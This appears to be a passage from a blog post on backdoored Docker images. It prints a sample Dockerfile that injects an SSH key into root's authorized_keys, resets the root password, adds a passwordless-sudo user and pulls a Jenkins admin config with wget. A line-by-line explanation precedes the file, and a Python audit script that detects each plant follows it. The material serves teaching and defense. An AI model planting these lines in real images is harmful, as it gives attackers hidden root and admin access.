Here is a simple example. Doubtless it would be misleading and hard to diagnose in the real world.
- In L18-19, an SSH key is injected into authorized_keys. If you start sshd, you're in danger.
- In L22, the root password has been reset. Not good, is it?
- In L25-26, a malicious OS user has been added.
- In L29-31, that user has been promoted to super admin and can run any command without a password!
- In L34-36, your Jenkins now has an unwanted admin user. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So can the hackers! This case represents the application layer of security. It's certainly the most dangerous and difficult case.
1: ########## How To Use Docker Image ###############
2: ##
3: ## Install docker utility
4: ## Download docker image:
5: ## docker pull denny/test:v1
6: ## Boot docker container:
7: ## docker run -t -P -d --name my-test denny/test:v1 /bin/bash
8: ##
9: ## Build Image From Dockerfile.
10: ## docker build -f Dockerfile -t denny/test:v1 --rm=false .
11: ##################################################
12:
13: FROM ubuntu:14.04
14: MAINTAINER Denny <denny@dennyzhang.com>
15:
16: RUN mkdir -p /root/.ssh && \
17: # SSH login by key file
18: echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
19: >> /root/.ssh/authorized_keys && \
20:
21: # Reset root password
22: echo 'root:ChangeMe1' | chpasswd && \
23:
24: # Add a malicious user
25: useradd denny && \
26: echo 'denny:ChangeMe1' | chpasswd && \
27:
28: # Add user to super admin
29: echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
30: /etc/sudoers.d/admins && \
31: chmod 400 /etc/sudoers.d/admins && \
32:
33: # Add superadmin user to Jenkins
34: mkdir -p /var/lib/jenkins/users/superadmin && \
35: wget -O /var/lib/jenkins/users/superadmin/config.xml \
36: https://github.com/dennyzhang/devops_public/raw/tag_v6/doc/admin_conf_xml
37:
38: CMD ["/bin/bash"]
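As an added example (not code from the original post), a small Python audit that pulls the relevant files out of a `docker export` tarball and flags each of the five backdoors planted above; `SAMPLE_ROOTFS` is a constructed stand-in for that tarball's contents, not data from the real image.

```python
import re
import tarfile

NOPASSWD = re.compile(r"^\s*[^#\s].*\bNOPASSWD\b", re.M)
JENKINS_USER = re.compile(r"^var/lib/jenkins/users/([^/]+)/config\.xml$")
LOCKED = {"", "*", "!", "!!", "!*"}   # shadow fields that mean "no password"


def audit_rootfs(files):
    """files maps rootfs-relative path -> text; returns (check, detail) findings."""
    found = []
    # Lines 18-19: a key in root's authorized_keys grants SSH login as root.
    keys = [k for k in files.get("root/.ssh/authorized_keys", "").splitlines()
            if k.strip() and not k.startswith("#")]
    if keys:
        found.append(("root_authorized_keys", f"{len(keys)} key(s)"))
    # Lines 22 and 26: base images ship accounts locked; a real hash means a password was set.
    for line in files.get("etc/shadow", "").splitlines():
        f = line.split(":")
        if len(f) > 1 and f[1] not in LOCKED:
            found.append(("password_set", f[0]))
    for path, text in sorted(files.items()):
        # Lines 29-31: any uncommented NOPASSWD rule under /etc/sudoers.d.
        if path.startswith("etc/sudoers.d/") and NOPASSWD.search(text):
            found.append(("sudo_nopasswd", path))
        # Lines 34-36: Jenkins user records baked into the image.
        m = JENKINS_USER.match(path)
        if m:
            found.append(("jenkins_user", m.group(1)))
    return found


def load_export(tar_path):
    """Pull only the audited files out of a `docker export` tarball."""
    files = {}
    with tarfile.open(tar_path) as tar:
        for member in tar:
            name = member.name.lstrip("./")
            wanted = (name in ("root/.ssh/authorized_keys", "etc/shadow")
                      or name.startswith("etc/sudoers.d/") or JENKINS_USER.match(name))
            if member.isfile() and wanted:
                files[name] = tar.extractfile(member).read().decode(errors="replace")
    return files


SAMPLE_ROOTFS = {  # constructed: what `docker export` of the image above would hold
    "root/.ssh/authorized_keys": "ssh-rsa AAAAB3Nza...KN5 denny@example.invalid\n",
    "etc/shadow": "root:$6$salt$hash:17000:0:99999:7:::\ndaemon:*:17000:0:99999:7:::\n"
                  "denny:$6$salt$hash:17000:0:99999:7:::\n",
    "etc/sudoers.d/admins": "%denny ALL=(ALL:ALL) NOPASSWD: ALL\n",
    "var/lib/jenkins/users/superadmin/config.xml": "<user><id>superadmin</id></user>\n",
}
```

Run `audit_rootfs(load_export("image.tar"))` against a real `docker export` to get the same findings list for a container you did not build yourself.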